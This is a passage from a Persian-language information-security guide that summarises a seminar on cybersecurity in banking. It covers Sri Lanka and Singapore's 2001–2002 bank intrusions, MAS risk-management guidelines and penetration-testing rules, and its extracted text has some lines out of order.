‫ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺑـﺎ ﺗﺨـﺼﻴﺺ ﻣﻨـﺎﺑﻊ ﻭ ﺯﻣـﺎﻥ ﻛـﺎﻓﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺭﺳﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﻨﻬﺎ ﺣـﺪﻭﺩ ‪ %۱۲،۹‬ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ‪ %۶،۱‬ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬
‫ﺍﺯ ﺧﻮﺩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺳﺮﻳﻼﻧﻜﺎ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﺳﺮﻳﻼﻧﻜﺎ ﺑﻴﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ‬
‫ﻣﺜﻞ ﻛﺮﻣﻬﺎ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻣـﺎ ﻣﻘﺎﻣـﺎﺕ‬
‫ﺳﺮﻳﻼﻧﻜﺎ ﺗﺎ ﻛﻨـﻮﻥ ﻫـﻴﭻ ﮔﺰﺍﺭﺷـﻲ ﺩﺭﺧـﺼﻮﺹ ﺣﻤـﻼﺕ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻛﺸﻮﺭ ﺣﺪﻭﺩ ‪ ۲۰‬ﺳﺎﻝ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ‪ .‬ﻫﺮﭼﻨـﺪ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﻳﻼﻧﻜﺎ ﺩﺭ ﺍﺑﺘﺪﺍﻱ ﺭﺍﻩ ﺍﺳﺖ ﺍﻣـﺎ ﺑـﻪ‬
‫ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﻭﺍﺝ ﻣﻲﺑﺎﺷـﺪ‪ .‬ﺗﺒـﺎﺩﻝ ﺳـﻬﺎﻡ ﻭ ﭘـﻮﻝ ﺑـﺼﻮﺭﺕ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻗﺎﺑﻞ ﺍﻧﺠﺎﻡ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻣﻜﺎﻧـﺎﺕ ﻧﻴـﺰ ﻫﻨـﻮﺯ ﺩﺭ‬
‫ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﺔ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺳـﺮﻳﻼﻧﻜﺎ‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺳﺮﻗﺖ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ‬
‫ﻋﺒﻮﺭ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪ ،‬ﺳـﻄﺢ ﺁﮔـﺎﻫﻲ ﺍﺯ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻳﻚ ﻣﺴﺌﻠﻪ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ‬
‫ﺑﻪ ﺩﻗﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﺭ ﺑﺨﺶ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ‬
‫ﺗﻮﻧﻲ ﭼﻮ‪ ٢٤٢‬ﻣﺪﻳﺮ ﻧﻈﺎﺭﺕ ﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺍﺩﺍﺭﺓ ﺍﻣـﻮﺭ‬
‫ﭘﻮﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ )‪ ٢٤٣(MAS‬ﻣﺮﻭﺭﻱ ﺍﺟﻤﺎﻟﻲ ﺑﺮ ﻣﻘـﺪﻣﺎﺕ ﺍﻣﻨﻴـﺖ‬
‫ﺳﺎﻳﺒﺮ ﺩﺍﺷﺖ‪ .‬ﻭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺑﻴﺎﻥ ﺍﻳﻦ ﻣﻄﻠـﺐ ﺁﻏـﺎﺯ ﻛـﺮﺩ‬
‫ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺑﺨﺶ ﺍﻭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﺑﻪ ﻣﺆﺳﺴﺎﺕ ﺁﮔﺎﻫﻲ ﺩﻫﺪ‪،‬‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﻫﺪ‪ ،‬ﻭ ﻳﺎ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﻬـﺎ ﺳـﺨﺘﮕﻴﺮﻱ‬
‫ﻧﻤﺎﻳﺪ"‪ .‬ﺳﻨﮕﺎﭘﻮﺭ ﻣﻲﻛﻮﺷﺪ ﺗﺎ ﺑﻪ ﻳﻚ ﻛﺎﻧﻮﻥ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ ﻭ ﺑﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺁﻥ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫‪242 Tony Chew‬‬
‫‪243 Monetary Authority of Singapore‬‬
‫‪٢٢٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻜﻬﺎﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ‪ ۲۰۰۱‬ﻭ ‪ ۲۰۰۲‬ﺗﻮﺳﻂ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ؛ ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻧﻴـﺎﺯ‬
‫ﻓﻮﺭﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﻪ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻚ ﺳﻨﮕﺎﭘﻮﺭ )‪ (UOB‬ﻭﺟـﻮﺩ‬
‫ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺧﻮﺩ ﻛﺸﻒ ﻛـﺮﺩ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﻜﻪ ﺑﻴﺸﺘﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﺎﻗﻲ‬
‫ﻣﺎﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﻌﻠﻮﻡ ﺷﺪﻛﻪ ﻧﻔﻮﺫﮔﺮﻫﺎﻳﻲ ﺍﺯ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﺑﻪ ﺳﻴﺴﺘﻢ‬
‫ﺑﺎﻧﻜﻲ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺍﺩﻩﻫﺎﻱ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺖ ﻭ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺟﻬـﺖ ﺑـﻪﺭﻭﺯﺁﻭﺭﻱ ﺣـﺴﺎﺏ ﻣـﺸﺘﺮﻳﺎﻥ‬
‫ﺩﺳﺘﻜﺎﺭﻱ ﺷﺪ‪ .‬ﻧﻪﺗﻨﻬﺎ ﭼﻨﺪ ﻣﺎﻩ ﻃﻮﻝ ﻛﺸﻴﺪ ﺗﺎ ﻣﺘﺨﺼﺼﻴﻦ ﺍﺻﻞ‬
‫ﻣﺸﻜﻞ ﺭﺍ ﺑﻴﺎﺑﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﻼﺵ ﺯﻳﺎﺩ ﻭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺻﺮﻑ ﺷﺪ ﺗﺎ‬
‫ﻛﺸﻒ ﺷﻮﺩ ﻛﻪ ﭼﻪ ﻛـﺴﺎﻧﻲ ﻭ ﻳـﺎ ﭼـﻪ ﭼﻴﺰﻫـﺎﻳﻲ ﻋﻮﺍﻣـﻞ ﺍﻳـﻦ‬
‫ﻣﺸﻜﻞ ﺑﻮﺩﻩﺍﻧﺪ‪.‬‬
‫ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺭﺧﺪﺍﺩﻫﺎ ﺗﺄﺛﻴﺮ ﺩﺍﺷـﺖ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻚﻋﺎﻣﻠﻲ ﺑﻮﺩ‪ .‬ﻫﻢﺍﻛﻨﻮﻥ ﻧﻴﺰ ﺑﻴـﺸﺘﺮ‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻳﺎ ﺩﻭ ﺣﺎﺩﺛﺔ ﺩﻫﺸﺘﻨﺎﻙ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﺑﻪ ﺗﺠﺪﻳﺪ ﻧﻈﺮ ﺩﺭ ﺍﻳﻦ ﺭﻭﻧﺪ ﻭﺍﺩﺍﺭ ﻛﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻮﻋﻲ‬
‫ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ‪ SSL‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛ ﺍﻣﺎ‬
‫ﺍﻣﻨﻴﺘﻲ ﻛﻪ ‪ SSL‬ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﺑﺴﻴﺎﺭ ﻣﺤـﺪﻭﺩ ﺍﺳـﺖ‪ ،‬ﭼﺮﺍﻛـﻪ‬
‫ﺗﻨﻬﺎ ﺩﺭ ﺧﻼﻝ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﻧﻪ ﺩﺭ‬
‫ﻣﺒﺪﺃ ﻳﺎ ﻣﻘﺼﺪ‪ .‬ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺩﻳﮕﺮ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ‬
‫ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ‬
‫ﺍﺩﺍﺭﺓ ﺍﻣــﻮﺭ ﭘــﻮﻟﻲ ﺳــﻨﮕﺎﭘﻮﺭ ﺑــﺮﺍﻱ ﻣﺆﺳــﺴﺎﺕ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ‬
‫"ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ" ﺷﺎﻣﻞ ‪ ۲۶‬ﺗﻮﺻـﻴﻪ ﺩﺭ‬
‫ﺯﻣﻴﻨﺔ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻻﻳﻪﺍﻱ ﺗﺪﻭﻳﻦ ﻛﺮﺩ‪ .‬ﺳﻪ ﺩﺳﺘﺔ ﺍﺻـﻠﻲ ﺍﻳـﻦ‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫‪.۱‬‬
‫‪.۲‬‬
‫‪.۳‬‬
‫ﺍﻳﺠﺎﺩ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻣﺴﺘﺤﻜﻢ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ‬
‫ﺗﻘﻮﻳﺖ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺍﻣﻨﻴﺖ‪ ،‬ﻭ ﻗﺎﺑﻠﻴﺖ ﺑﺎﺯﻳﺎﺑﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘـﻮﻟﻲ‬
‫ﺳﻨﮕﺎﭘﻮﺭ ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﻧﺠﺎﻡ ﺣﺪﺍﻗﻞ ﺳـﺎﻟﻲ ﻳﻜﺒـﺎﺭ ﺁﺯﻣـﻮﻥ‬
‫ﻧﻔﻮﺫ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺤﻴﻂ ﻛـﺎﺭ ﻧﻤـﻮﺩ‪ .‬ﺍﻳـﻦ ﺍﺩﺍﺭﻩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﺗـﻴﻢ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺑـﺮﺍﻱ ﺩﺭﺟـﻪﺑﻨـﺪﻱ‬
‫ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺍﺳﺖ؛ ﻛﻪ ﺑﺮ ﻣﺒﻨﺎﻱ ﺷـﺶ‬
‫ﻣﻌﻴﺎﺭ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘﻮﻟﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺗﻌﻴـﻴﻦ ﺷـﺪﻩ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ‪ ،‬ﻣﺆﺳﺴﺎﺕ ﺭﺍ ﺍﺯ ﻟﺤﺎﻅ ﻣﻴـﺰﺍﻥ ﺍﻳﻤﻨـﻲ ﺑـﻪ‬
‫ﭘﻨﺞ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺷـﻤﺎﺭﺓ ‪ ۱‬ﻧـﺸﺎﻧﮕﺮ ﺍﻣـﻦﺗـﺮﻳﻦ ﻭ‬
‫ﺷﻤﺎﺭﺓ ‪ ۵‬ﻧﺸﺎﻧﮕﺮ ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ ﻛـﻪ‬
‫ﺩﺭ ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﺭﺟﺔ ‪ ۲‬ﺩﺳﺖ ﻳﺎﺑﻨﺪ‪ ،‬ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ‬
‫ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻃﺮﺡ ﺑﺎﺯﻳﺎﺑﻲ ﻭ ﺗﺮﻣﻴﻢ ﺳﺮﻳﻊ ﻧﻴﺰ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﭘﻴﺸﺮﻓﺖ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺑﺎﻧﻜﻬـﺎ ﻭ ﺍﻟﻘـﺎﻱ‬
‫ﺣﺲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ‪ ،‬ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺭﺟﻪﺑﻨﺪﻱ ﺑـﺼﻮﺭﺕ ﻋﻤـﻮﻣﻲ‬
‫ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﺑﻪ ﮔﺰﺍﺭﺵ ﻫﺮﮔﻮﻧـﻪ‬
‫ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑـــﺎ ﺍﻓـــﺰﺍﻳﺶ ﺍﺳـــﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳـــﺘﮕﺎﻫﻬﺎﻱ ﺳـــﻴﺎﺭ ﭘﺮﺩﺍﺧـــﺖ‪،‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ‬
‫ﮔﻴﺮﻧﺪ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﺠﺮﺑﻴﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺑـﻲﺳـﻴﻢ‬
‫ﺳﻨﮕﺎﭘﻮﺭ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺟﻤﻊﺑﻨﺪﻱ ﺳﺆﺍﻻﺕ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‬
‫ﺗﻮﺻﻴﻪﻫﺎ ﻭ ﭘﺮﺳﺸﻬﺎﻱ ﭘﺎﻳﺎﻧﻲ ﺷﺎﻣﻞ ﻧﻘﺎﻁ ﻛﻠﻴﺪﻱ ﺍﻳـﻦ ﺳـﻤﻴﻨﺎﺭ‬
‫ﺟﻬﺎﻧﻲ ﺑﻮﺩ‪.‬‬
‫ﻲ ﻧﻴﺎﺯﻫﺎﻱ ﺣـﺎﻝ‬
‫ﺍﻭﻝ‪ ،‬ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ ﻭ ﺁﮔﺎﻫﻲ ﺩﺭ ﺁﻣﻮﺯﺵ ﻋﻤﻮﻣ ﹺ‬
‫ﺣﺎﺿﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨـﺪ‪ .‬ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﻣﺜـﻞ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﺳﺎﻝ ‪ ،۲۰۰۲‬ﺣﻤﻠﺔ ﺩﻳﮕﺮﻱ ﺑﻪ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ‬
‫)‪ (DBS‬ﺻــﻮﺭﺕ ﮔﺮﻓــﺖ‪ .‬ﺩﺭ ﺍﻳــﻦ ﺭﻭﻳــﺪﺍﺩ ﻧﻔــﻮﺫﮔﺮﺍﻥ ﺑــﺪﻟﻴﻞ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻛﻲ ﺷـﺒﻜﻪ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻧﺎﻣﻨﺎﺳـﺐ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﺗﻮﺍﻧﺴﺘﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ‪۲۱‬‬
‫ﻣﺸﺘﺮﻱ ﺑﺎﻧﻚ ﺗﻌﺒﻴﻪ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﺗـﺎ ﺷـﻤﺎﺭﺓ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ )‪ (PIN‬ﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺎﻳﻲ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺪﺳـﺖ‬
‫ﺁﻭﺭﻧــﺪ‪ .‬ﺍﻳــﻦ ﺣﺎﺩﺛــﻪ ﺳــﺒﺐ ﺷــﺪ ‪ ۶۲,۰۰۰‬ﺩﻻﺭ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ‬
‫ﻣﺸﺘﺮﻳﺎﻥ ﺿﺮﺭ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻧﻜﺘﺔ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺗﺄﺛﻴﺮ ﻣﻨﻔﻲ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺩﺭ ﺍﻓﻜﺎﺭ ﻋﻤﻮﻣﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﺑﻮﺩ؛‬
‫ﭼﺮﺍﻛﻪ ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻛﺸﻮﺭ ﺑﻪ ﻣـﺪﺕ ﻳﻜﻤـﺎﻩ ﺩﺭ ﺍﻳـﻦ ﺧـﺼﻮﺹ‬
‫ﻣﻄﻠﺐ ﻧﻮﺷـﺘﻨﺪ‪ .‬ﺍﻣﺜـﺎﻝ ﺍﻳـﻦ ﺭﺧـﺪﺍﺩﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺑﺤـﺮﺍﻥ‬
‫ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﻣﺮﺩﻡ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣﻨﺠـﺮ‬
‫ﺷﻮﻧﺪ‪.‬‬
‫ﺗﻀﻤﻴﻦ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ‪PIN‬ﻫﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺷﻮﺩ؛ ﺍﻣﺎ ﺍﻳﻦ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ ،‬ﭼـﻮﻥ ‪PIN‬ﻫـﺎ ﻛﻮﭼـﻚ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪.‬‬
‫‪٢٢٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫"ﺍﻟﺰﺍﻡ ﮔﺰﺍﺭﺵ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﻜﻮﻙ" ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ‬
‫ﻛﻪ ﺑﻪ ﻣﺮﺣﻠﺔ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ‪.‬‬
‫ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻟﻲ ﺍﺯ ﻧﺤﻮﺓ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ‬
